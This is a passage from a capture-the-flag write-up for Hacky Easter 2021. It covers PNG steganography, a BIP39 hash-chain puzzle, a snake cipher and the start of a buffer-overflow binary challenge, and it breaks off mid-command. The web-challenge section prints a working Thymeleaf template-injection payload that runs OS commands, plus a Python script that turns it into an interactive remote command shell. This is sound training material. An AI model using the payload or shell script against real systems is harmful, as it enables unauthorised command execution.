compressed data, best compression\r\n14353         0x3811          Zlib compressed data, best compression\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe decompressed zlib data contains the pixel data, which is essentially one palette index per pixel (each scanline is additionally preceded by one PNG filter byte, which is why the script below uses a width of 1025 for the 1024 pixel wide image):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ hexdump -C _twoyolks.png.extracted\/3811 | head\r\n00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\r\n*\r\n000001e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 03  |................|\r\n000001f0  0c 0a 05 05 08 04 04 06  06 09 09 07 07 07 0b 0f  |................|\r\n00000200  0f 0f 0f 0b 07 07 07 09  09 06 06 04 04 08 05 05  |................|\r\n00000210  0a 0c 03 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\r\n00000220  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\r\n*\r\n000005e0  00 00 00 00 00 00 00 00  00 0c 0a 05 04 06 09 0b  |................|\r\n000005f0  0f 0f 0f 0f 0f 0f 0f 0f  0f 0f 0f 0f 0f 0f 0f 0f  |................|\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nI used the following script to display only the pixels with a certain value from the palette. 
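<\/p>\r\n\r\n<p>\r\nAdded example (not the author's code): the same analysis done with the standard library alone. It walks the PNG chunks with CRC verification, reports chunk types outside the specification (such as the <span class=\"hl\">YHDR<\/span> chunk pngcheck flagged) and inflates the IDAT stream into scanlines, dropping the filter byte that precedes each row (the byte the 1025-wide image in the script below accounts for). The 4x4 palette PNG with a private trailing chunk is constructed inline; all names in it are the example's own.\r\n<\/p>\r\n\r\n```python
#!/usr/bin/env python3
"""Walk the chunks of a PNG, flag non-standard chunks, and pull the palette
indices out of the pixel stream.

Added example for HE21.32 (not the author's extract0r.py). It reproduces with
the standard library what pngcheck, binwalk and the PIL trick did in the
write-up: every chunk is listed with its CRC checked, chunk types that are not
in the PNG specification are reported, and the IDAT stream is inflated and
split into scanlines, dropping the one filter byte that precedes every row.
The sample image is constructed inline.
"""
import struct
import zlib

PNG_SIGNATURE = b'\x89PNG\r\n\x1a\n'
STANDARD_CHUNKS = {'IHDR', 'PLTE', 'IDAT', 'IEND', 'tRNS', 'gAMA', 'cHRM', 'sRGB',
                   'iCCP', 'tEXt', 'zTXt', 'iTXt', 'bKGD', 'pHYs', 'sBIT', 'sPLT',
                   'hIST', 'tIME'}


def iter_chunks(data):
    """Yield (offset, type, payload, crc_ok) for each chunk, in file order."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError('not a PNG file')
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack('>I4s', data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc = struct.unpack('>I', data[pos + 8 + length:pos + 12 + length])[0]
        crc_ok = (zlib.crc32(ctype + payload) & 0xffffffff) == crc
        yield pos, ctype.decode('latin-1'), payload, crc_ok
        pos += 12 + length


def unknown_chunks(data):
    """Types of all chunks that are not defined by the PNG specification."""
    return [t for _, t, _, _ in iter_chunks(data) if t not in STANDARD_CHUNKS]


def palette_entries(data):
    """Number of PLTE entries (3 bytes each), the figure pngcheck reports."""
    plte = next(p for _, t, p, _ in iter_chunks(data) if t == 'PLTE')
    return len(plte) // 3


def palette_indices(data):
    """Inflate the IDAT stream of an 8-bit palette image and return one list
    of palette indices per scanline, with the leading filter byte removed.

    Only filter type 0 (None) is accepted, which is what the challenge image
    uses; any other filter type would need the PNG unfiltering step.
    """
    chunks = list(iter_chunks(data))
    ihdr = next(p for _, t, p, _ in chunks if t == 'IHDR')
    width, height, depth, ctype = struct.unpack('>IIBB', ihdr[:10])
    if depth != 8 or ctype != 3:
        raise ValueError('only 8-bit palette images are handled here')
    raw = zlib.decompress(b''.join(p for _, t, p, _ in chunks if t == 'IDAT'))
    stride = width + 1                       # 1 filter byte + width indices
    if len(raw) != stride * height:
        raise ValueError('pixel stream has unexpected size')
    rows = []
    for y in range(height):
        line = raw[y * stride:(y + 1) * stride]
        if line[0] != 0:
            raise ValueError(f'unsupported filter type {line[0]} in row {y}')
        rows.append(list(line[1:]))
    return rows


def mask_for_index(rows, n):
    """Rows of 0/1 marking the pixels that use palette entry n (the
    black/white picture the author's script renders for entry 15)."""
    return [[1 if v == n else 0 for v in row] for row in rows]


def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xffffffff
    return struct.pack('>I', len(payload)) + ctype + payload + struct.pack('>I', crc)


def build_sample_png():
    """Constructed 4x4 palette PNG whose pixels draw a diagonal with index 15,
    followed by a private 'YHDR' chunk like the one in the challenge file."""
    width = height = 4
    ihdr = struct.pack('>IIBBBBB', width, height, 8, 3, 0, 0, 0)
    plte = bytes(range(16 * 3))            # 16 dummy RGB entries
    rows = [[15 if x == y else 0 for x in range(width)] for y in range(height)]
    raw = b''.join(b'\x00' + bytes(r) for r in rows)   # filter byte 0 per row
    idat = zlib.compress(raw, 9)
    return (PNG_SIGNATURE + _chunk(b'IHDR', ihdr) + _chunk(b'PLTE', plte)
            + _chunk(b'IDAT', idat) + _chunk(b'YHDR', b'') + _chunk(b'IEND', b''))


if __name__ == '__main__':
    png = build_sample_png()
    for off, t, payload, ok in iter_chunks(png):
        print(f'chunk {t} at offset {off:#x}, length {len(payload)}, crc ok: {ok}')
    print('non-standard chunks:', unknown_chunks(png))
    print('palette entries:', palette_entries(png))
    for row in mask_for_index(palette_indices(png), 15):
        print(''.join('#' if v else '.' for v in row))
```
\r\n\r\n<p>\r\nThe extraction script itself is short. 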
The script iterates through the raw pixel data and creates a corresponding <span class=\"hl\">PIL.Image<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport sys\r\nfrom PIL import Image\r\n\r\n# palette index to isolate, passed on the command line\r\nn = int(sys.argv[1])\r\n\r\n# 1024 pixels plus 1 filter byte per scanline, hence a width of 1025\r\nimg = Image.new('RGB', (1025,1024))\r\ndata = []\r\n\r\n# raw (decompressed) pixel data as extracted by binwalk\r\nct = open('_twoyolks.png.extracted\/3811','rb').read()\r\nfor c in ct:\r\n  # black where the pixel uses palette entry n, white everywhere else\r\n  if (c == n): data.append((0,0,0))\r\n  else: data.append((255,255,255))\r\n\r\nimg.putdata(data)\r\nimg.save('out.png')\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe palette entry <span class=\"hl\">15<\/span> turned out to be a good choice:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ .\/extract0r.py 15\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ display out.png\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_32_02.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ zbarimg out.png \r\nQR-Code:he2021{tw0_y0lks_are_gre33eat}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{tw0_y0lks_are_gre33eat}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_33\">HE21.33 Finding Mnemo<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge33.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">8 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nDorie has forgotten everything again... 
Luckily, there is a backup:\r\n\r\nadapt    3555  \r\nbind     824e  \r\nbless    8fcf  \r\nblind    81db  \r\ncivil    03ec  \r\ncraft    ed05  \r\ngarage   9db4  \r\ngood     d2ba  \r\nhalf     1272   \r\nhip      8d53  \r\nhome     21b7  \r\nhotel    1cb0  \r\nlonely   e5b8  \r\nmagnet   16b9  \r\nmetal    770e  \r\nmushroom dd80  \r\nnapkin   0829  \r\nreason   ecd3  \r\nrescue   5ef2  \r\nring     e3b0  \r\nshift    4ea1  \r\nsmall    f1f6  \r\nsunset   b271  \r\ntongue   f08d  \r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nGoogling for the words in the first column reveals that we are probably dealing with <a href=\"https:\/\/en.bitcoin.it\/wiki\/Seed_phrase#BIP39_and_its_flaws\" rel=\"noopener noreferrer\" target=\"_blank\">BIP39<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nBIP39 is basically a mapping between words and 11-bit values. <a href=\"https:\/\/medium.com\/coinmonks\/mnemonic-generation-bip39-simply-explained-e9ac18db9477\" rel=\"noopener noreferrer\" target=\"_blank\">Here<\/a> and <a href=\"https:\/\/learnmeabitcoin.com\/technical\/mnemonic\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a> are good descriptions.\r\n<\/p>\r\n\r\n<p>\r\nIn order to determine the 11-bit value of a word, we need to find its position within the <a href=\"https:\/\/github.com\/bitcoin\/bips\/blob\/master\/bip-0039\/english.txt\" rel=\"noopener noreferrer\" target=\"_blank\">BIP39 wordlist<\/a> and convert the index to an 11-bit value.\r\n<\/p>\r\n\r\n<p>\r\nThe second important insight is that the values in the second column are the beginning of the sha256 hash of the words. 
Though not of the word in the same row, but of the word in another row:\r\n<\/p>\r\n\r\n<p>\r\nFor example <span class=\"hl\">adapt<\/span> &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/33]\r\n\u2514\u2500$ echo -n adapt|sha256sum  \r\n<span class=\"hl2\">f1f6<\/span>1cc7216e18012d97bcfc33ae7a69995846c612b317073bff4e4cd52fd353  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; matches the value from <span class=\"hl\">small<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nsmall    f1f6 \r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nOr <span class=\"hl\">bind<\/span> &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/33]\r\n\u2514\u2500$ echo -n bind|sha256sum\r\n<span class=\"hl2\">f08d<\/span>d851c430f52f3fbe9692678a2e2c3cf9009035a13a5cf080ce9ed2125ce9  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; matches the value from <span class=\"hl\">tongue<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ntongue   f08d  \r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWhat is also noticeable here is that the value from <span class=\"hl\">ring<\/span> &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nring     e3b0  \r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; seems to match the <span class=\"hl\">SHA256<\/span> hash of the empty string:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/33]\r\n\u2514\u2500$ echo -n |sha256sum \r\n<span class=\"hl2\">e3b0<\/span>c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAccordingly there must be one word whose <span class=\"hl\">SHA256<\/span> prefix is not present in the second column at all. This word is <span class=\"hl\">half<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nIn order to get the flag we need to find the correct order of the words and determine the corresponding 11-bit value for each of them. 
The result is a long bit string, which only needs to be converted to ASCII to get the flag.\r\n<\/p>\r\n\r\n<p>\r\nThe reason for the <span class=\"hl\">SHA256<\/span> of <span class=\"hl\">half<\/span> not being present is that <span class=\"hl\">half<\/span> is the first word (similarly we can assume that <span class=\"hl\">ring<\/span> is the last word).\r\n<\/p>\r\n\r\n<p>\r\nIn order to determine the second word, we use the value in the second column of <span class=\"hl\">half<\/span>: <span class=\"hl\">1272<\/span>. This is the beginning of the <span class=\"hl\">SHA256<\/span> hash of <span class=\"hl\">civil<\/span>. Thus <span class=\"hl\">civil<\/span> is the next word. We proceed like this until the end (word <span class=\"hl\">ring<\/span>).\r\n<\/p>\r\n\r\n<p>\r\nThe following script automates the whole process:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport hashlib\r\n\r\n# BIP39 English wordlist, one word per line\r\nbip39 = open('english.txt').read().split('\\n')\r\n# (word, hash prefix) pairs from the challenge text\r\nwords = [('adapt','3555'),('bind','824e'),('bless','8fcf'),('blind','81db'),('civil','03ec'),('craft','ed05'),('garage','9db4'),('good','d2ba'),('half','1272'),('hip','8d53'),('home','21b7'),('hotel','1cb0'),('lonely','e5b8'),('magnet','16b9'),('metal','770e'),('mushroom','dd80'),('napkin','0829'),('reason','ecd3'),('rescue','5ef2'),('ring','e3b0'),('shift','4ea1'),('small','f1f6'),('sunset','b271'),('tongue','f08d')]\r\n\r\n# index of the word in the wordlist as an 11-bit binary string\r\ndef get_11bit(w):\r\n  n = bip39.index(w)\r\n  return format(n, '#013b')[2:]\r\n\r\n# the word whose SHA256 starts with the 4 hex digits h\r\ndef get_next_word(h):\r\n  for w in words:\r\n    m = hashlib.sha256()\r\n    m.update(w[0].encode())\r\n    if (m.hexdigest()[:4] == h):\r\n      return w\r\n\r\n# pack the bit string into 8-bit characters\r\ndef bit_str_to_ascii(s):\r\n  r = ''\r\n  for i in range(0, len(s), 8):\r\n    r += chr(int(s[i:i+8],2))\r\n  return r\r\n\r\n# start with the word whose hash prefix no row references\r\nw = ('half','1272')\r\nbit_str = ''\r\n\r\n# follow the chain of hash prefixes from word to word\r\nfor i in range(len(words)-1):\r\n  bit_str += get_11bit(w[0])\r\n  w = get_next_word(w[1])\r\n  
print(w[0])\r\n\r\nprint(bit_str_to_ascii(bit_str))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script yields the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/33]\r\n\u2514\u2500$ .\/solv0r.py \r\ncivil\r\nmetal\r\ngood\r\nbless\r\nreason\r\nshift\r\nhome\r\ngarage\r\nnapkin\r\nsunset\r\ntongue\r\nbind\r\nrescue\r\nmushroom\r\nhip\r\nhotel\r\nlonely\r\nblind\r\nsmall\r\nadapt\r\ncraft\r\nmagnet\r\nring\r\nhe2021{f1sh_r_fr1ends_n0t_f00d!\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{f1sh_r_fr1ends_n0t_f00d!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_34\">HE21.34 The Five Seasons<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge34.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">8 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nDid you know there were five seasons?\r\n\r\nFind the flag file!\r\n\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2111<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\nThe &#x1F41F; is just a trap &#x1F63C;\r\n\r\nA hint is hiding in one of the poems.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nOn the provided website one of five seasons can be selected:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_01.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe page of each season contains a poem:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_02.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWhen providing a non-existing season in the GET-parameter (e.g. 
<span class=\"hl\">xx<\/span>), an error is displayed stating that the template <span class=\"hl\">page-xx<\/span> was not found:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_03.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAccording to the hint we should look for a hint in one of the poems. In order to do this I downloaded the original poems and compared them with the poems on the page. This yielded the following difference:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/34]\r\n\u2514\u2500$ diff sp.txt sp_on.txt\r\n6c6\r\n&lt; In the blossom-robed Thyme Leaves;\r\n---\r\n&gt; In the blossom-robed trees;\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe word <span class=\"hl\">trees<\/span> from the original poem was replaced by <span class=\"hl\">Thyme Leaves<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nCombining this with the error message suggests that we are dealing with a <span class=\"hl\">Thyme Leaves<\/span> (i.e. Thymeleaf) <a href=\"https:\/\/portswigger.net\/research\/server-side-template-injection\" rel=\"noopener noreferrer\" target=\"_blank\">SSTI<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nBy googling a little bit I came upon <a href=\"https:\/\/www.fatalerrors.org\/a\/sprboot-thymeleaf-template-injection-for-java-security-development.html\" rel=\"noopener noreferrer\" target=\"_blank\">this<\/a> blog post, which describes this kind of vulnerability and also provides a payload to execute OS commands:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22whoami%22).getInputStream()).next()%7d__::.x\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can directly use this payload in the GET-parameter <span class=\"hl\">season<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_04.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nIt might not be too obvious at first, but we actually executed the command <span class=\"hl\">whoami<\/span>. 
The result is displayed in the template name: <span class=\"hl\">seasons<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nAfter testing different commands it turned out that the response will only contain characters until the first whitespace (the payload reads the output with <span class=\"hl\">Scanner.next()<\/span>, which returns only the first whitespace-delimited token). If we e.g. run <span class=\"hl\">ls<\/span>, we only see the first file in the response:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_05.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAlso a pipe (<span class=\"hl\">|<\/span>) cannot be used directly in the command <span class=\"hl\">String<\/span>, since <span class=\"hl\">Runtime.exec<\/span> starts the program directly rather than through a shell.\r\n<\/p>\r\n\r\n<p>\r\nWhen initially solving the challenge, I verified that the file <span class=\"hl\">flag.txt<\/span> exists by running <span class=\"hl\">ls flag.txt<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_06.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nIn order to output it we can use <span class=\"hl\">base64 -w0 flag.txt<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_34_07.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to decode it:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/34]\r\n\u2514\u2500$ echo d2VsbCBkb25lLCBoZXJlIGlzIHlvdXIgZmxhZzogaGUyMDIxe1NwcjFuZ18xc19teV9mNHZydF9zMzRzbiF9|base64 -d\r\nwell done, here is your flag: he2021{Spr1ng_1s_my_f4vrt_s34sn!}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIt is, however, also possible to run arbitrary commands and get the full output.\r\n<\/p>\r\n\r\n<p>\r\nFor this to work a <span class=\"hl\">String<\/span> array like <span class=\"hl\">{&quot;sh&quot;,&quot;-c&quot;,&quot;ls|base64&quot;}<\/span> must be provided to <span class=\"hl\">getRuntime().exec<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe following script does this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport requests\r\nfrom base64 import b64decode\r\n\r\ndef run_cmd(cmd):\r\n  url = 
'http:\/\/46.101.107.117:2111\/season?season='\r\n  url += '__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(new String[]{\"sh\",\"-c\",\"'+cmd+'|base64 -w0\"}).getInputStream()).next()}__::i.x '\r\n  r = requests.get(url)\r\n  return b64decode(r.text.split('[page-')[1].split('], ')[0]).decode()\r\n\r\nwhile True:\r\n  c = input('&gt; ')\r\n  print(run_cmd(c))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThis way it is a little bit more comfortable to run commands:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/34]\r\n\u2514\u2500$ .\/shell0r.py                                                                                                                                                   1 \u2a2f\r\n&gt; id\r\nuid=999(seasons) gid=999(seasons) groups=999(seasons)\r\n\r\n&gt; ls -al\r\ntotal 19440\r\ndrwxr-xr-x 1 root root     4096 Mar  2 13:23 .\r\ndrwxr-xr-x 1 root root     4096 Apr 15 09:01 ..\r\n-rwxr-xr-x 1 root root 19888619 Mar  2 13:23 app.jar\r\n-rwxr-xr-x 1 root root       63 Mar  2 13:23 flag.txt\r\n-rwxr-xr-x 1 root root       41 Mar  2 13:23 start.sh\r\n\r\n&gt; cat flag.txt\r\nwell done, here is your flag: he2021{Spr1ng_1s_my_f4vrt_s34sn!}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{Spr1ng_1s_my_f4vrt_s34sn!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_35\">HE21.35 The Snake<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge35.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">8 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nCunning snake has a little riddle for you:\r\n\r\n<span 
class=\"hl\">21{_inake0dltn_2olospena__iht_fthet!}<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\n- It's a self-made algorithm, not one you'll find in the web.\r\n- Look at the snake in the title image.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nIt was quite challenging to find the correct pattern. Thanks to <span class=\"hl\">daubsi<\/span> for a heads-up.\r\n<\/p>\r\n\r\n<p>\r\nI ended up with this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nDIRECTION   CHARACTERS                              SUBSTRING\r\n-------------------------------------------------------------\r\n            21{_inake0dltn_2olospena__iht_fthet!}\r\n   &lt;-                3     2     1     0            he20\r\n   -&gt;       456       7     8     9     abc         21{dont_f\r\n   &lt;-                  f     e     d                all\r\n   -&gt;          012      3     4     5      678      _into_the\r\n   &lt;-                    b     a     9              _sn\r\n   -&gt;             cde     f     0     1       234   ake_pit!}\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{dont_fall_into_the_snake_pit!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_36\">HE21.36 Doldrums<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge36.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">8 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Pwn<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>daubsi<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nWithout wind, no ship can sail.\r\n\r\nThis one is really secure. 
I promise!\r\n\r\n<span class=\"hl\">nc 46.101.107.117 2113<\/span>\r\n\r\nGet a shell and read the flag.\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<span class=\"fake_link\">doldrums<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nUbuntu 18.04 64 Bit\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe setting for this last pwn binary was a little bit different mainly because we are dealing with a 32-bit ELF file, which is stripped. Again it is dynamically linked, without canaries, nx enabled, no pic and partial relro:\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ file doldrums \r\ndoldrums: <span class=\"hl2\">ELF 32-bit<\/span> LSB executable, Intel 80386, version 1 (SYSV), <span class=\"hl2\">dynamically linked<\/span>, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=d035ad0d34a664be7426cd2196a55c38438e19cc, <span class=\"hl2\">stripped<\/span>\r\n                                                                                                                                                                       \r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ r2 -A doldrums                \r\n[x] Analyze all flags starting with sym. 
and entry0 (aa)\r\n[x] Analyze function calls (aac)\r\n[x] Analyze len bytes of instructions for references (aar)\r\n[x] Check for objc references\r\n[x] Check for vtables\r\n[x] Type matching analysis for all functions (aaft)\r\n[x] Propagate noreturn information\r\n[x] Use -AA or aaaa to perform additional experimental analysis.\r\n[0x080484d0]&gt; iI\r\narch     x86\r\nbaddr    0x8048000\r\nbinsz    5928\r\nbintype  elf\r\nbits     32\r\n<span class=\"hl2\">canary   false<\/span>\r\nclass    ELF32\r\ncompiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0\r\ncrypto   false\r\nendian   little\r\nhavecode true\r\nintrp    \/lib\/ld-linux.so.2\r\nladdr    0x0\r\nlang     c\r\nlinenum  false\r\nlsyms    false\r\nmachine  Intel 80386\r\nmaxopsz  16\r\nminopsz  1\r\n<span class=\"hl2\">nx       true<\/span>\r\nos       linux\r\npcalign  0\r\n<span class=\"hl2\">pic      false<\/span>\r\nrelocs   false\r\n<span class=\"hl2\">relro    partial<\/span>\r\nrpath    NONE\r\nsanitiz  false\r\nstatic   false\r\nstripped true\r\nsubsys   linux\r\nva       true\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nSince the binary is stripped, I used <span class=\"hl\">ghidra<\/span> this time, which makes it a little bit more comfortable.\r\n<\/p>\r\n\r\n<p>\r\nAt first we search for the <span class=\"hl\">entry<\/span> function. 
The function passed to the call to <span class=\"hl\">__libc_start_main<\/span> is the actual <span class=\"hl\">main<\/span> function (I already renamed it here):\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_36_01.png\" alt=\"Pwn\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWithin the <span class=\"hl\">main<\/span> function we can see that yet again the unsafe <span class=\"hl\">gets<\/span> is used:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_36_02.png\" alt=\"Pwn\"\/>\r\n<\/p>\r\n\r\n<p>\r\nSince there are no stack canaries, we can use this to overflow the return address on the stack.\r\n<\/p>\r\n\r\n<p>\r\nLet&#8217;s begin by determining the offset to the return address again:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/36]\r\n\u2514\u2500$ <span class=\"hl2\">gdb 